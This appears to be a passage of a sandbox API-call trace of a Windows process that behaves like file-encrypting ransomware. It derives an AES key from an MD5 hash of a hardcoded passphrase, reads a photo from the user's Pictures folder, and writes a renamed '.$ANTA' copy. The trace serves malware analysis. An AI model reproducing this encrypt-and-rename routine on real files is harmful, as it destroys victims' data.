szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0092.249] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0092.249] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0092.285] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0092.286] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0092.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0092.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.286] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0092.286] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cad18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0092.286] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0092.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0092.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0092.286] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0092.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0092.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0092.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.287] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caca0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0092.287] CryptHashData (hHash=0x41ac6c0, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0092.287] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.287] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0092.287] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0092.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cabc8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0092.287] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac6c0, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac700) returned 1 [0092.287] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.287] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0092.287] CryptDestroyHash (hHash=0x41ac6c0) returned 1 [0092.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0092.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0092.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0092.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0092.289] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0092.289] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0092.289] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0092.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0092.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0092.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0092.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0092.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0092.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0092.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0092.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0092.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0092.290] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\6EeiE520t8A11Pm.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\6eeie520t8a11pm.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0092.290] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.290] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0092.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0092.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0092.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0092.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0092.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0092.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0092.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.290] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0092.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0092.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0092.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0092.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0092.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0092.291] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0092.291] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0092.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0092.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0092.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0092.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0092.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0092.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0092.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0092.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0092.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0092.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0092.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0092.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0092.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0092.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0092.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0092.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0092.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0092.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0092.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0092.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0092.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0092.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0092.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4e98 [0092.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0092.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0092.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0092.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0092.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4e98 | out: hHeap=0x1780000) returned 1 [0092.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0092.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0092.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0092.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0092.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0092.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3f8 [0092.293] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0092.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3f8 | out: hHeap=0x1780000) returned 1 [0092.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0092.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0092.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0092.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0092.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0092.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.293] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\6EeiE520t8A11Pm.jpg.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\6eeie520t8a11pm.jpg.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0092.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0092.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0092.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0092.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0092.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0092.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0092.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.294] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0092.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0092.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0092.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0092.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0092.295] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0092.295] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0092.295] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0092.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0092.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0092.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0092.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0092.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0092.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0092.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0092.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0092.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0092.299] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0092.299] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0092.302] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x4b8d, lpOverlapped=0x0) returned 1 [0092.302] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0092.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0092.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0092.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14b8d) returned 0x4516010 [0092.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0092.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0092.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0092.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 